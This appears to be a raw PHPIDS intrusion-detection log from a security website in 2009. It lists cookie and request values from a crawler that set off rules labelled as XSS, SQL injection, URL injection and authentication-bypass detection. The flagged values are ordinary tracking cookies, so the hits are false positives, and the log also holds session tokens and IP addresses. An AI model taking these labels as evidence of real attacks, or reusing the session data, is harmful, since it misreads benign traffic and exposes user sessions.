Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59218
Name:COOKIE.DB
Value:msRandX=46&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59219
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=2203982&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59220
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:27:"/gallery/entry/2918/pulse8/";}
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59221
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=12072999&CFTOKEN#=95503253&jsessionid#=3030926fd567a4f251d77b785b61a6f03749#lastvisit={ts '2009-11-07 18:20:06'}#timecreated={ts '2009-11-07 07:03:19'}#hitcount=10#cftoken=26242667#cfid=1647418#
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59222
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:35 GMT
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59223
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:54:"/news/permalink/all-about-shadow-volumes-presentation/";i:1;s:52:"/site/article/why-australia-should-not-adopt-an-ets/";i:2;s:72:"/apple/comment/appletell-reviews-the-bookarc-desktop-stand-for-macbooks/";i:3;s:83:"/weblog/artikel/Drei-Abos-warten-Das-Webstandards-Magazin-geht-in-die-zweite-Runde/";}
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59224
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"408fb43b93e16a02874ea901d1b6eb45";s:10:"ip_address";s:12:"78.46.48.164";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671906";}5d6d952fc2b5121dc8db56822d73a180
Page:/i.php?page=videos%2Fpn12%2Firongeek-hardware-keyloggers-use-review-and-stealth
IP:78.46.48.164
Impact:218
Created:2009-11-07 17:37:32
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59027
Name:REQUEST.PREF
Value:ID=20fd167e89c67864:TM=1257636027:LM=1257636027:S=W1-vw36YKGCtb4md
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59028
Name:REQUEST.language
Value:--
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59029
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20354
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59030
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4938551&sku=H94-2502&SRCCODE=WEBRSS002&cm_mmc=RSS-_-TigerDirect-_-Carls-_-RSS
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59031
Name:REQUEST.DB
Value:msRandX=14&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59032
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 8:48:57 AM
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59033
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2643168&CFTOKEN#=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63&jsessionid#=30309a9ac39d048b184830114813426bda49#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 15:45:27'}#hitcount=4#cftoken=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63#cfid=2643168#
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59034
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:55:"/workshops/How-to-prepare-for-FTA-negotiations-Part-II/";i:1;s:55:"/site/article/century-trends-in-victorian-temperatures/";i:2;s:56:"/blog/recession-special-5-great-sites-to-save-you-money/";i:3;s:54:"/apple/comment/sims-3-world-adventures-expansion-pack/";}
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59035
Name:REQUEST.OAGEO
Value:US||||||||||
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59036
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"d4e45039be7ab5084d08928b6426a40e";s:10:"ip_address";s:11:"78.46.34.48";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}2363a05e223f03e91d692312f294a5ce
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59037
Name:COOKIE.PREF
Value:ID=20fd167e89c67864:TM=1257636027:LM=1257636027:S=W1-vw36YKGCtb4md
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59038
Name:COOKIE.language
Value:--
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59039
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20354
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59040
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-Details.asp?EdpNo=4938551&sku=H94-2502&SRCCODE=WEBRSS002&cm_mmc=RSS-_-TigerDirect-_-Carls-_-RSS
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59041
Name:COOKIE.DB
Value:msRandX=14&ItemDetailsBeta=Y&msProduct=335878&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150A.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150A.jpg
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59042
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=11/7/2009 8:48:57 AM
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59043
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2643168&CFTOKEN#=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63&jsessionid#=30309a9ac39d048b184830114813426bda49#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 15:45:27'}#hitcount=4#cftoken=abc9fcff707241ea-CEE85DF8-DD81-42FD-FA80CA5635295B63#cfid=2643168#
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59044
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:55:"/workshops/How-to-prepare-for-FTA-negotiations-Part-II/";i:1;s:55:"/site/article/century-trends-in-victorian-temperatures/";i:2;s:56:"/blog/recession-special-5-great-sites-to-save-you-money/";i:3;s:54:"/apple/comment/sims-3-world-adventures-expansion-pack/";}
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59045
Name:COOKIE.OAGEO
Value:US||||||||||
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59046
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"d4e45039be7ab5084d08928b6426a40e";s:10:"ip_address";s:11:"78.46.34.48";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671884";}2363a05e223f03e91d692312f294a5ce
Page:/i.php?page=security%2Fdefcon-17-writeup
IP:78.46.34.48
Impact:210
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59047
Name:REQUEST.PREF
Value:ID=5fdb30591a25309b:TM=1257607342:LM=1257607342:S=is5eulZ3IC_MbxX7
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59048
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59049
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1647430&CFTOKEN#=92479335&jsessionid#=3030d05bc6ccb8b34fbf6482925a9651f201#lastvisit={ts '2009-11-07 07:03:30'}#timecreated={ts '2009-11-07 07:03:30'}#hitcount=3#cftoken=92479335#cfid=1647430#
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59050
Name:REQUEST.cm__tracker
Value:a:2:{i:0;s:26:"/gallery/entry/2891/duall/";i:1;s:38:"/gallery/entry/2928/eye-design-studio/";}
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59051
Name:REQUEST.DB
Value:msRandX=79&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59052
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3975924&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59053
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:72:"/news/view/educators_see_secure_coding_training_challenges_improvements/";i:1;s:91:"/site/berichten/20091106_marcom_debat_2009_expertteams_sneller_beter_en_flexibeler_of_niet/";i:2;s:55:"/weblog/artikel/Deutschsprachige-Twitter-Einfuehrungen/";i:3;s:25:"/post/fluid_theme_is_out/";}
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59054
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"1672b96a43831ea3baaf4358041196a8";s:10:"ip_address";s:12:"78.46.48.168";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671883";}5d4fd76ea4eebf05e1aeece2a44309d1
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59055
Name:COOKIE.PREF
Value:ID=5fdb30591a25309b:TM=1257607342:LM=1257607342:S=is5eulZ3IC_MbxX7
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59056
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59057
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1647430&CFTOKEN#=92479335&jsessionid#=3030d05bc6ccb8b34fbf6482925a9651f201#lastvisit={ts '2009-11-07 07:03:30'}#timecreated={ts '2009-11-07 07:03:30'}#hitcount=3#cftoken=92479335#cfid=1647430#
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59058
Name:COOKIE.cm__tracker
Value:a:2:{i:0;s:26:"/gallery/entry/2891/duall/";i:1;s:38:"/gallery/entry/2928/eye-design-studio/";}
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59059
Name:COOKIE.DB
Value:msRandX=79&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59060
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3975924&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59061
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:72:"/news/view/educators_see_secure_coding_training_challenges_improvements/";i:1;s:91:"/site/berichten/20091106_marcom_debat_2009_expertteams_sneller_beter_en_flexibeler_of_niet/";i:2;s:55:"/weblog/artikel/Deutschsprachige-Twitter-Einfuehrungen/";i:3;s:25:"/post/fluid_theme_is_out/";}
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59062
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"1672b96a43831ea3baaf4358041196a8";s:10:"ip_address";s:12:"78.46.48.168";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671883";}5d4fd76ea4eebf05e1aeece2a44309d1
Page:/i.php?page=videos%2Fpn12%2Fnathan-hamiel-shawn-moyer-satan-is-on-my-friends-list-attacking-social-networks
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59063
Name:REQUEST.PREF
Value:ID=5fdb30591a25309b:TM=1257607342:LM=1257607342:S=is5eulZ3IC_MbxX7
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59064
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59065
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1647430&CFTOKEN#=92479335&jsessionid#=3030d05bc6ccb8b34fbf6482925a9651f201#lastvisit={ts '2009-11-07 07:03:30'}#timecreated={ts '2009-11-07 07:03:30'}#hitcount=3#cftoken=92479335#cfid=1647430#
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59066
Name:REQUEST.cm__tracker
Value:a:2:{i:0;s:26:"/gallery/entry/2891/duall/";i:1;s:38:"/gallery/entry/2928/eye-design-studio/";}
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59067
Name:REQUEST.DB
Value:msRandX=79&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59068
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3975924&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fhandgrip-buttstock-open-source-ak-47s
IP:78.46.48.168
Impact:216
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59069
Name:REQUEST.exp_tracker
